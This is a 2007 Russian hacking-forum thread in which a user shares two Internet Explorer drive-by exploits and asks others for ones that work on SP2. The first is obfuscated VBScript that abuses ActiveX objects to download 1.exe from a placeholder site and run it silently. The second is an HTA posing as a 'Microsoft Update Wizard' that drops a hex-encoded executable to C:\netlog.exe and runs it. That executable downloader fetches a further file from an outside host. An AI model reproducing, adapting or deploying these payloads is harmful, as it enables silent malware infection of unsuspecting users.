Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Вопрос о Эксплоите для Ie (https://forum.antichat.xyz/showthread.php?t=49744)

4uTeP 24.09.2007 18:05
Вопрос о Эксплоите для Ie
 
Есть эксплоит : <html>
<body>
<script language="VBScript">
on error resume next
xurl_0="http://САЙТ точка рУ /1.exe"
wbb61f=""
ibb72o="A"
fbb83u="dodb.Stream"
ess01a="Microsoft.XMLH"
uss12h="T"
vss83s="TP"
mcc11h="clsid:BD96C556-65A3-11D0-983A-00C04FC29"
xcc22r="E"
xcc33n="36"
boo71b="Scrip"
doo52e="t"
koo23v="ing.FileSystemObject"
djj61a="obj"
ajj82p="e"
hjj03t="ct"
kcl11r="cla"
mcl42e="s"
lcl63c="sid"
tse41c="Shell.Appli"
bse72h="c"
yse43t="ation"
l5sus0=ess01a&uss12h&vss83s
h3b2bp=wbb61f&ibb72o&fbb83u
c2cac2=mcc11h&xcc22r&xcc33n
j0o2ok=boo71b&doo52e&koo23v
h7jdj8=djj61a&ajj82p&hjj03t
o5l8lo=kcl11r&mcl42e&lcl63c
t0eke8=tse41c&bse72h&yse43t
Set j5d5fa = document.createElement(h7jdj8)
j5d5fa.setAttribute o5l8lo, c2cac2
set x0f5b = j5d5fa.createobject(j0o2ok,"")
set e1x3j = j5d5fa.CreateObject(l5sus0,"")
set h4sm7 = j5d5fa.CreateObject(h3b2bp,"")
set d8qr6 = j5d5fa.CreateObject(t0eke8,"")
set cte2mp = x0f5b.GetSpecialFolder(2)
h4sm7.type = 1
q1get="GET"
e1x3j.Open q1get, xurl_0, False
e1x3j.Send
a5L_xy30= "1.exe"
a5L_xy30= x0f5b.BuildPath(cte2mp,a5L_xy30)
h4sm7.open
h4sm7.write e1x3j.responseBody
h4sm7.savetofile a5L_xy30,2
h4sm7.close
d8qr6.ShellExecute a5L_xy30,"","","open",0
</script>
</body>
</html>


Но непашет у всех. (Под виндой) , нету у кого-то другово скриптика??
если есть оставте в топе.Пасиб

Zitt 24.09.2007 18:21
мпак.... ищи на хек порталах...

Termin@L 24.09.2007 18:36
Я так понял, что он exeшник запускает,
xurl_0="http://САЙТ точка рУ /1.exe" - менял?

P.S. а IE бывает под unix????

gibson 24.09.2007 18:58
есть специальная тема посвещенная эксплоитам под ие дуй сюда
http://forum.antichat.ru/thread24465-exploit.html
а так по чаще посещяй милворн

mr.The 24.09.2007 21:12
аффтор. тебе сюда
http://milw0rm.com/

4uTeP 29.09.2007 03:23
На милворме или плохо искал либо ненашел то что нужно.
>gibson В том топе ненашел ничего хорошего..
>Termin@L Менял менял. мне нужно чтоб под SP2 тож шло.
Вот еще есть на .HTA



<HTML><HEAD><TITLE>Microsoft Update Wizard</TITLE>
<HTA:APPLICATION id=MSUpdate
APPLICATIONNAME="Microsoft Update"
SHOWINTASKBAR=NO
CAPTION=YES
SINGLEINSTANCE=YES
MAXIMIZEBUTTON=NO
MINIMIZEBUTTON=NO
WINDOWSTATE=MINIMIZE
/></HEAD>
<OBJECT id="MSmedia" classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></OBJECT>
<OBJECT id="MSplay" classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></OBJECT>
<BODY><SCRIPT language="VBScript">
self.MoveTo 6000,6000
z=""
a="4"+"D"+"5"+"A"
z=z+(h(a))
z=z+(H("90000300000004000000FFFF0000B8000000000000 00400000000000000000000000000000000000000000000000 000000000000000000000000D80000000E1FBA0E00B409CD21 B8014CCD21546869732070726F6772616D2063616E6E6F7420 626520"))
z=z+(H("72756E20696E20444F53206D6F64652E0D0D0A2400 00000000000003E9D8DE4788B68D4788B68D4788B68D2597A5 8D4188B68DC494B88D4688B68D4788B78D5088B68D2897B28D 4488B68D13AB878D4688B68D526963684788B68D0000000000 0000000000"))
z=z+(H("0000000000000000000000000000504500004C0101 00E9E004430000000000000000E0000F010B01060000060000 00000000000000005412000000100000002000000000400000 10000000020000040000000000000004000000000000000020 0000000200"))
z=z+(H("000000000002000000000010000010000000001000 00100000000000001000000000000000000000002813000050 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 0000000000"))
z=z+(H("000000000000000000000000000000000000000000 00000000000000001000005400000000000000000000000000 00000000000000000000000000002E746578740000007E0400 00001000000006000000020000000000000000000000000000 200004E000"))
z=z+(H("0000000000000046140000F4130000001400000E14 00001A140000281400003A14000000000000DE130000D61300 00CC1300000000000003000080100000801300008004000080 34000080090000801700008073000080000000000000000000 0000000000"))
z=z+(H("00000D0A0D0A00000000323030204F4B0000626573 742D766F796575722E696E666F00000000474554202F6D7361 7263682E65786520485454502F312E300D0A486F73743A2062 6573742D766F796575722E696E666F0D0A0D0A000000006D73 617263682E"))
z=z+(H("65786500000000000000000000558BECB8CCA20700 E8130200005356578D8558FEFFFF506801010000FF154C1040 0033DB536A016A02FF15481040008BF083FEFF8975FC0F8440 0100006A5066C745EC0200FF1544104000FF7508668945EEFF 1540104000"))
z=z+(H("3BC30F841D0100008B400C8B008B008945F06A108D 45EC5056FF153C10400083F8FF0F84FD00000053FF750CFF15 0410400050FF750C56FF1538104000395D100F84D800000053 BBA00F0000538D85345DF8FF50568B35341040008DBD345DF8 FFEB1B8BCF"))
z=z+(H("8D95345DF8FF2BCA81F920A107007D0F6A005303F8 57FF75FCFFD685C07FDF83F8FF0F8498000000FF75FC802700 8D85345DF8FF8BF72BF0FF15301040008B3D281040008D8534 5DF8FF686810400050FFD785C059597468686010400050FFD7 8BF885FF59"))
z=z+(H("5974586A0068800000006A026A006A0368000000C0 FF751083C704FF15101040008BD883FBFF74336A008D45E850 2BF78D8435345DF8FF505753FF150C10400085C0741753FF15 0810400085C0740C33C040EB0956FF153010400033C05F5E5B C9C3558BEC"))
z=z+(H("81EC58010000568D85A8FEFFFF506804010000FF15 0010400068BC1040008D85A8FEFFFF50FF15181040008D85A8 FEFFFF5068841040006870104000E838FEFFFF83C40C33F683 F801753E6A448D45AC5650E8720000006A108D45F05650C745 AC44000000"))
z=z+(H("E85F00000083C4188D45F0508D45AC505656565656 568D85A8FEFFFF5056FF151410400056FF15241040005ECCCC CCCCCCCCCCCC513D001000008D4C2408721481E9001000002D 0010000085013D0010000073EC2BC88BC485018BE18B088B40 0450C3CCFF"))
z=z+(H("2520104000CCCC981300000000000000000000E813 00002010000078130000000000000000000056140000001000 00A81300000000000000000000721400003010000000000000 0000000000000000000000000000000046140000F413000000 1400000E14"))
z=z+(H("00001A140000281400003A14000000000000DE1300 00D6130000CC13000000000000030000801000008013000080 040000803400008009000080170000807300008000000000C5 027374727374720000490265786974000099026D656D736574 00004D5356"))
z=z+(H("4352542E646C6C000008036C7374726C656E410000 1B00436C6F736548616E646C6500DF02577269746546696C65 00340043726561746546696C65410044004372656174655072 6F63657373410000F9026C7374726361744100006501476574 54656D7050"))
z=z+(H("6174684100004B45524E454C33322E646C6C000041 445641504933322E646C6C00005753325F33322E646C6C0000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 0000000000"))
z=z+(H("000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 0000000000"))
z=z+(H("000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 0000000000"))
z=z+(H("000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000 0000000000"))
z=z+(H("000000000000000000000000000000000000000000 00000000000000"))
FileName="C:\netlog.exe"
set IESetup=MSmedia.CreateTextFile(FileName, TRUE)
IESetup.Write(z)
IESetup.Close()
MSplay.Run (FileName),1,TRUE
MSmedia.DeleteFile(FileName)
self.Close
Function H(H1)
Dim H2
Dim H3:H2=""
For H3=1 To Len(H1) Step 2
m=1
H2=H2&Chr("&h"&Mid(H1,H3,2))
m=0
Next
H=H2
End Function
</SCRIPT></BODY></HTML>

СОздает в C: нетлог ехе. Скрипт старый но рабочий ток вот немогу нИкаГ раскодировать СиМволы и изменить под себя .


Время: 18:22